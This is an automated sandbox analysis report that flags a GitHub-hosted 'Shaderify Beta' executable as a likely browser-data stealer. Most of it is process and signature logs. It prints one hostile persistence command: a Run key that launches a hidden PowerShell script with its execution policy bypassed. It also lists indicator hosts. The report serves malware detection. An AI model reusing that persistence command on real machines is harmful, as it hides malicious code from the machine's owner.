Malware Analysis Report

2024-11-13 14:28

Sample ID 240603-lltzlsbe85
Target https://github.com/crunexy/shaderify/blob/main/Shaderify%20Beta%208.4.4.exe
Tags
execution persistence spyware stealer
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

Threat Level: Likely malicious

The file https://github.com/crunexy/shaderify/blob/main/Shaderify%20Beta%208.4.4.exe was found to be: Likely malicious.

Malicious Activity Summary

execution persistence spyware stealer

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Loads dropped DLL

Reads user/profile data of web browsers

Executes dropped EXE

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

An obfuscated cmd.exe command-line is typically used to evade detection.

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

NTFS ADS

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Kills process with taskkill

Enumerates system info in registry

Enumerates processes with tasklist

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 09:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 09:37

Reported

2024-06-03 09:40

Platform

win10v2004-20240426-en

Max time kernel

125s

Max time network

130s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/crunexy/shaderify/blob/main/Shaderify%20Beta%208.4.4.exe

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\aysGxbumtnpCIYJ.ps1\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipapi.co N/A N/A
N/A ipapi.co N/A N/A

An obfuscated cmd.exe command-line is typically used to evade detection.

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 744464.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Users\Admin\Downloads\Shaderify Beta 8.4.4.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4852 wrote to memory of 4624 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 4624 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 3232 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 4548 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 4548 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4852 wrote to memory of 2340 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/crunexy/shaderify/blob/main/Shaderify%20Beta%208.4.4.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa1ec946f8,0x7ffa1ec94708,0x7ffa1ec94718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3464 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

